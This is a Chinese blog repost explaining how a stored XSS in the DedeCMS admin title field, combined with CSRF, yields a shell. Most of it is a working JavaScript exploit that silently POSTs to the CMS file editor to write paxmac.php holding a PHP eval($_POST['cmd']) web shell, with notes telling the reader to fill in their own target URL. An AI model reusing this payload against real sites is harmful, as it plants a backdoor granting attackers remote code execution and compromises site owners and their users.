博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
dedecms利用xss+csrf getshell
阅读量:5341 次
发布时间:2019-06-15

本文共 1251 字,大约阅读时间需要 4 分钟。

dedecms的漏洞很多,但是厂商都是不做修复。

之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。

后台可触发xss

利用js代码

01 var request = false;
02 if(window.XMLHttpRequest) {
03 request = new XMLHttpRequest();
04 if(request.overrideMimeType) {
05 request.overrideMimeType('text/xml');
06 }
07 } else if(window.ActiveXObject) {
08 var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
09 for(var i=0; i<versions.length; i++) {
10 try {
11 request = new ActiveXObject(versions[i]);
12 } catch(e) {}
13 }
14 }
15 xmlhttp=request;
16  
17 getshell();
18 function getshell(){
19  
20 var postStr="fmdo=edit&backurl=& activepath=%2Fdedecmsfullnew%2Fuploads%2Fuploads& filename=paxmac.php&str=%3C%3Fphp+eval%28%24_POST%5B%27cmd%27%5D%29 %3B%3F%3E&B1=++%B1%A3+%B4%E6++";//url需要自己修改
21  
22 xmlhttp.open("POST", "", true);//url需要自己修改
23 xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
24 xmlhttp.setRequestHeader("Content-length", postStr.length);
25 xmlhttp.setRequestHeader("Connection", "close");
26 xmlhttp.send(postStr);
27 }

 

触发前

触发后

转载于:https://www.cnblogs.com/mujj/articles/3121749.html

你可能感兴趣的文章
2017-2018-1 20155330《信息安全技术》实验二——Windows口令破解
查看>>
20155210 实验一 逆向与Bof基础
查看>>
20个有用的正则表达式
查看>>
PTA 02-线性结构3 Reversing Linked List (25分)
查看>>
.Net开源框架列表【转载】
查看>>
(转)Linux内核之进程和系统调用
查看>>
C#如何计算代码执行时间
查看>>
项目更新到公网服务器的操作步骤
查看>>
js练习- 给你一个对象,求有几层
查看>>
阿里前端一面
查看>>
Android 软键盘的显示和隐藏,这样操作就对了
查看>>
【DP+拓扑】关键子工程
查看>>
Jenkins创建job时Check-out Strategy各个选项详细说明(含图)
查看>>
js android页面被挂起问题解决
查看>>
1-4-13:分段函数
查看>>
DAL 层引用 System.Net.Http ,引发的一阵心慌
查看>>
写在最前面的话
查看>>
C语言计算字符串子串出现的次数
查看>>
Python之路【第九篇】:Python操作 RabbitMQ、Redis、Memcache、SQLAlchemy
查看>>
ios录音Demo
查看>>